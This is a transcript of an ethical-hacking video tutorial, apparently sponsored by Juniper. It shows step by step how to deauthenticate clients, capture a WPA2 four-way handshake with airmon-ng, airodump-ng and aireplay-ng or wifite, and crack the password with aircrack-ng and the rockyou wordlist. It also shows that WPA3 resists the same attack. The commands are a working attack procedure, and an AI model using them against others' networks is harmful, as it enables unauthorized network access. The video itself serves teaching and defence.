Cracking WiFi WPA2 Handshakes (And does it work with WPA3?)

in this video I'm going to show you how to use airmon-ng  to discover Wi-Fi networks around you and then  

de-authenticate clients connected to a specific  Wi-Fi network so that we can capture the four-way  

handshake I'll show you how to open up the capture  in Wireshark and look at the four-way handshake  

and see the Wi-Fi password but probably the part  that most people are interested in is I'm going to  

show you how to crack the Wi-Fi password may  this be a warning to you and your family why  

you should use good Wi-Fi passwords I'm going  to show you some of the issues using WPA 2 and  

why you probably want to use WPA 3 today if at  all possible you also want to make sure that you  

use good passwords don't use weak passwords don't  use passwords like I'm going to show you in this  

demonstration don't use passwords like your  telephone number it's amazing how many people  

still use bad passwords today I'll also show you  how to use Wifite to crack the Wi-Fi network Wifite

is basically a script that combines a whole  bunch of tools together to make it much much  

easier to crack Wi-Fi networks but I'll show you  in this video how Airmon-ng and Wifite can be used  

to crack a WPA 2 network but fails to crack WPA 3  use WPA 3 if you can also look at using Wi-Fi 6 use  

5 GHz and 6 GHz far fewer devices support those  frequencies however but they give you more bands  

so better WI-FI and it's less likely that someone  using a basic adapter like this will be able to  

crack those networks because this only supports  2.4 GHz I'll also show you in this video how you  

can use Mist to download packet captures from  an access Point's point of view so when there's  

an authorization failure wrong password is used  what do the Wireshark captures look like so I'll  

show you those as well in this video so for this  demonstration I'm going to be attacking a Mist  

Wi-Fi network this is an AI powered Wi-Fi network  but if it's badly configured hackers will still be  

able to attack that Wi-Fi network so I'll show  you later in the video how you can improve the  

Wi-Fi security of a Mist Network or even just  a standard home network a lot of the principles  

still apply I really want to thank Juniper for  sending me their Wi-Fi access points as well as  

sponsoring this video to help you learn the issues  with poorly configured Wi-Fi networks and how to  

better secure them. Now that's enough talking let's  get started now in this demonstration I'm using  

a alpha network adapter the problem with this  adapter is it only supports 2.4 GHz you do get  

other Wi-Fi adapters like this this supports 5 GHz  as an example and Wi-Fi 6E Alpha not sponsoring  

this video I purchased this adapter myself  but Alpha did send me this adapter and other  

adapters I really like the alpha adapters very  very good adapters recommended by a lot of people  

so what I'll do is plug this Alpha adapter into  my computer and on my computer you can see it says  

new USB device detected connect to host or connect  to Virtual Machine what I'll do here is connect it  

to my Kali virtual machine and click okay now  for this demonstration I'm using Kali Linux within  

a virtual machine in this example it's VMware  workstation Pro which is now free on a Windows 11  

computer now you could use Kali natively question  that always seems to come up is people ask do I  

need to buy an external Wi-Fi adapter that really  depends if you're using a Virtual Machine like  

I am then you're going to need an external Wi-Fi  adapter but if you install Kali natively as an  

example you may be able to crack Wi-Fi networks  just using the built-in Wi-Fi adapter the reason  

I'm using this and the reason why there's always  a caveat or an issue with Wi-Fi adapters is Wi-Fi  

adapters need to support monitoring mode and  injection mode so you need a Wi-Fi adapter that  

supports those two things monitoring and injection  so your built-in Wi-Fi adapter can be used if it  

supports packet injection and monitoring mode  so in Kali I've got a terminal open and if  

I use the command cat/etc/os-release you can see  that for this demonstration I'm using Kali version  

2024.1 now depending on when you're watching this  video there may be a newer release of Kali Linux  

just use the latest release uname -a also shows  me that I'm using Kali Linux here do you have to  

use Kali no it just makes it a lot easier to do  these demonstrations Kali has a lot of built-in tools  

that you can use for ethical hacking now it's  really important that I say this only attack  

Wi-Fi networks that you own or have permission to  attack I have given myself permission to attack  

this wi-fi network Juniper have given me this  access point so this is an access point that I  

own and I've given myself permission to attack  it now my team has created an amazing PDF  

that you can use if you want a nice reference so  I'll link that below it shows you what you need  

so as an example VMware or virtual box so Wi-Fi  adapter that supports monitor mode and your own  

access point that you can attack as an example  the commands that I'm going to demonstrate here  

are available below this video so the commands  and other information are available in that PDF  

but I'm going to run you through the commands here  let's see if the Wi-Fi adapter is discovered so  

if I type ip addr in Kali you can see that  WLAN 0 is shown there are different ways to do  

this another way is to use iw dev this shows you  your Wi-Fi adapters you can see the interface  

is WLAN 0 and what's important to note here  is it's in managed mode if you're used to Old the  

commands IW config may still work it works on Kali  Linux notice WLAN 0 is in managed mode we are going  

to turn this into monitor mode to attack Wi-Fi  networks we're going to use Airmon-ng to enable monitor  

mode but before we do that I'm going to kill any  conflicting processes so put in my password you  

can see the WPA supplicant was killed be careful  when you turn a adapter into monitor mode it'll  

kill your internet connection so in this case  it's not a problem because here I've actually  

got an external Wi-Fi adapter that I'm doing the  attacks on and I've also got a built-in ethernet  

connection which is basically the connection from  VMware to Windows which gives me internet access  

so I could as an example ping google.com from  this virtual machine but just be aware that if  

you don't have two adapters if you enable monitor  mode on your adapter you won't be able to connect  

to the internet anymore okay so with that being  said let's enable monitor mode by using sudo  

which gives us root privileges airmon-ng start wlan0 so  previously the interface name was wlan0 now if I use  

the command iw dev as an example notice the interface  type is monitor and the interface name is now wlan0mon  

old command IW config shows something  similar interface is wlan0mon the mode is now  

monitor mode so the interface name has changed in  Linux there's always different ways to do things  

so you could just use the command airmon-ng as an  example to see that the interface is now wlan0mon 

just use whichever command you prefer iw dev  is the new command okay so we want to discover  

Wi-Fi networks around us so we're going to use  the command sudo which gives us root privileges  

again airodump -ng wlan0mon press enter and a  whole bunch of Wi-Fi networks are displayed I'll  

stop that now by pressing contrl C this is the  network that we're going to attack so on this  

access point I've created two SSIDs demo Wi-Fi 2.4  GHz WPA3 and WPA2 and I want to show you you how I  

can attack WPA 2 but won't be able to attack WPA 3 so what we want to get here is we want to get  

the BSSID name so copy that we want to get the  channel information so that's Channel 11 and the  

name of the Wi-Fi network so grab that information  and store it somewhere so I've stored it here in  

a text file as an example BSSID channel number  and the ESSID now it's really important that you  

actually understand what you're doing rather than  just being script kitty as some people would say  

so let me explain some details here the BSSID is  the MAC address of your access point the power is  

the signal strength so notice this number -38 is showing that this wi-fi network has a much  

greater strength than say another Wi-Fi network at  the top here being -86 so in the attached PDF  

notice we've got signal strength information as  reported by the Wi-Fi adapter so around -40 is a  

good signal around 55 average signal 70 is a week  signal 80 to 90 lower limit of signal strength  

this is the channel number 2.4 GHz we're only  going to see a small number of channels many  

more channels available in 5 GHz and 6 GHz as an  example here we can see the encryption used so  

WPA2 using CCMP as the cipher here we can see a  network using WPA that's really bad and here we  

can also see open networks that aren't using  encryption ideally today you should be using  

WPA3 so notice this demo Wi-Fi 2.4 GHz WPA3  network is using WPA3 CCMP as the encryption  

much better again to use WPA3 versus WPA2 okay  so that's interesting but let's actually launch  

an attack because that's probably what most  people interested in we're going to use the  

command sudo for root privileges airodump -ng  we're going to write the output to a Wi-Fi capture  

file so this is just a name of a file you could  change that to something else the channel That  

We're attacking is channel 11 which we previously  discovered the BSSID is the MAC address of the  

Wi-Fi network that we previously discovered and  this is the interface that we're going to use so  

running that command now we can see at the moment  that no clients are connected we can see the ESSID  

and at the top here we're not seeing a capture  of the four-way handshake so what we're going  

to do is we're going to open up another window  and we are going to deauth clients on that access  

point so sudo for root privileges aireplay  -ng deauth 0 we're going to deauth all clients and we  

not going to stop deauthing so continuous deauthing of the MAC address of the access point  

make sure that you substitute this with your Mac  address so the MAC address that you're attacking  

and then the Wi-Fi interface wlan0mon okay put  in my password and as you can see deauth also being  

sent to the access point so to make sure that we  get a capture we're going to connect to that Wi-Fi  

network so I'll connect to the Wi-Fi network and  what you can see here is a WPA handshake has been  

captured so what happens is when I connect to the  WPA 2 Network notice a handshake is captured on  

Kali but my client keeps getting bumped off that  Network so the connection is failed to WPA2 and  

it actually ends up connecting to WPA3 because  it's knocked off WPA2 so the client was knocked  

off the network and we captured the handshake  and that's what we need to crack it okay so now  

that we've captured the handshake we can stop the  deauth attack and we can stop airodump -ng type  

ls here notice we see the capture so there's the  capture cap file and we can simply use Wireshark  

now to open up that capture and I'll use & so  that I can get control back so in Wireshark there  

will be a lot of information here but let's filter  for the handshake so notice here we can see Mist  

authenticating the client we can see our client EAPOL  message message 1 or 4 here's two and that's  

going to be a reply back from the client to the  AP so that's what we're interested in so if we  

look at the 802.1x authentication and we scroll  down notice WPA key data and here we've captured  

the key from the client to the AP which we now can  decrypt so what's really nice here is you can see  

all the communication between the client and the  AP and then capture the four-way handshake okay  

so let's go back one thing you probably want to  do is stop monitor mode so we use the command  

sudo airmon -ng stop wlan0mon so now if I do iw dev  notice the network interface is back to being WLAN0  

and is managed so we've changed it from  monitor mode to managed mode if you don't do this  

you won't be able to use this interface for normal  internet surfing as an example okay so that's nice  

but we probably want to crack this password found  in that file now there multiple ways to do this  

you could use a dictionary attack or you could use  brute force I'll put a link to a video below that  

shows you how to use GPUs to do a brute Force  attack against a Wi-Fi password but all we're  

going to do in this example is use a word list  Kali has a bunch of word lists so if I search for  

word lists a whole bunch of them are shown here  and I'm asked whether I want to extract the rockyou 

dictionary or word list and the answer is going  to be yes this file is using gzip so that I can use  

it to crack the Wi-Fi network and to do that we  going to use the command aircrack -ng the capture  

file which is that the word list we're going to  use is user word lists rockyou so just to make  

that clear I'll clear the screen the capture file  that we've captured that would be the name of the  

file that you have and the word list we're going  to use is rockyou and I mean that took seconds  

notice there's the command it's reading the  packets it's decoding them and password used  

here was spiderman really bad password don't  use bad passwords even if you've got an amazing  

wi-fi system this is a missed AI system if it's  badly configured people will be able to crack your  

network use strong passwords use uppercase use  lower case use special characters make it long  

20 characters in length or longer 25 30 if you  can don't use simple passwords like this you saw  

how simple that was to crack now that's an example  of a really poorly configured Wi-Fi network on the  

the Juniper Mist interface I can go and look at  my network so here's the demo Wi-Fi 2.4 GHz WPA2  

Network and here's my password really bad idea  once again to use psk with such a poor password  

you in an enterprise are going to want to use 802.1X with a radio server to make your network much  

more secure but let's have a look at the other  network which is WPA3 so I've also got a WPA3  

network configured with a really bad password  of spiderman let's see if we can crack that  

one so back on Kali let's first demonstrate  the sudo script kitty way of doing it so I'm  

going to use wifite to attack the Wi-Fi network  wifite basically does a lot of the work for you it  

enables monitor mode it's already done that it  shows you the Wi-Fi network so here's the demo  

Wi-Fi network using WPA2 here's the network using  WPA3 what I'll do is I'll attack the WPA version  

2 Network just to show you how easy it is to crack  using wifite so I'm not going to use pmk ID I'm  

going to continue attacking in this case looking  for a handshake so this is very similar to what  

we did with airmon-ng what I'm going to do is get this  phone to connect to the WPA2 Network and as soon  

as it did that notice the password was captured  and it's using the probable word list here to get  

the password which is spiderman so if you were  doing this as an attacker you would just wait for  

a client to connect to the network obviously  here I'm speeding things up by get the client  

to connect to the network straight away notice  how easy it was to crack that network again  

by trying to crack the WPA3 network so I'll stop  this and in this case it's going to be Network 2  

so this WPA3 network I'm going to stop the pmk ID  attack and press continue and now on the phone I'm  

going to connect to the network to WPA3 and notice  here it says failed to crack handshake did not  

contain a password so if I type ls and go to the  HS folder here type ls notice there is the capture  

for WPA2 here's the capture for WPA3 here it's  attacking that Wi-Fi network if I search for EAPOL  

it's got the capture so the forward handshake has  been captured here but it's not able to crack the  

password let's try and do it the old fashion way  so aircrack -ng the file and we'll use the rockyou  

password and notice it says unsupported  version key encountered WPA3 not yet supported so  

it tries to attack it but can't crack that not  support it so I've now shown you two ways to  

crack a WPA2 Wi-Fi network we used airmon-ng the hard  way then I used wifite which basically combines  

a bunch of tools together and makes it much easier  I was able to crack that password when this access  

point is using WPA2 but I'm not able to crack it  when it's using WPA3 so in the real world look at  

WPA3 the only problem with WPA3 is not all clients  can support it so what you might have to do is put  

your older clients on a separate network so put  them on a WPA2 Network as your insecure Network  

and put your important clients on a WPA3 network  and look at using 5 GHz and 6 GHz this network  

adapter can't see 5 GHz or 6 GHz networks as  an example so someone would have to invest in a  

more expensive network adapter to attack you the  whole idea was ities just put up barriers make  

it harder for an attacker to attack your network  look at using WPA3 look at using 5 GHz 6 GHz look  

at very good passwords strong passwords don't use  passwords like spiderman in Juniper Mist's portal  

going to monitor service levels we'll be able to  see things that are taking place so as an example  

notice here Galaxy S22 Ultra authorization and  Association that's happening a lot in a very short  

amount of time something's wrong here notice  de-association authorization and association  

a whole bunch of messages like that and then the  client was able to successfully access the network  

so I'm going to run the deauth attack again on  the client I'm going to try and connect to that  

Network and what's happening all the time is it's  getting disconnected connection failed on Juniper  

Mist system we can see this happening a lot time  is 12:57 about and notice all these authorization  

and association messages have happened in the last  few seconds a whole bunch of them taking place  

the client can't connect to the network under  badge here we can also see where there's been an  

authorization failure so the pixel 7 had the wrong  password as an example and what's nice here is we're  

told that there's been an authorization issue psk  failed so wrong password and what's really nice  

is you can download a packet capture and look  at that and you'll be able to see association  

request association response and other messages  so what I really like about the Mist system is you  

can download packet captures very very easily for  example for authorization failures or association  

failures you can download those packet captures  and see what's going on okay I hope you enjoyed  

this video if you did please like it please  consider subscribing to my YouTube channel and  

clicking the bell to get notifications I'm David  Bombal and I want to wish you all the very best